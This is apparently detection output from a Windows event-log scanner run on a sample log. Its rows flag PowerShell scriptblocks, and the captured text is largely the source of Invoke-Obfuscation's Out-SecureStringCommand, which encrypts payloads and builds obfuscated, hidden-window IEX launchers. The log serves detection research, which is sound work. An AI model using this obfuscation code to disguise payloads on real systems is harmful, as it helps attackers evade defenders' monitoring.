-Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } 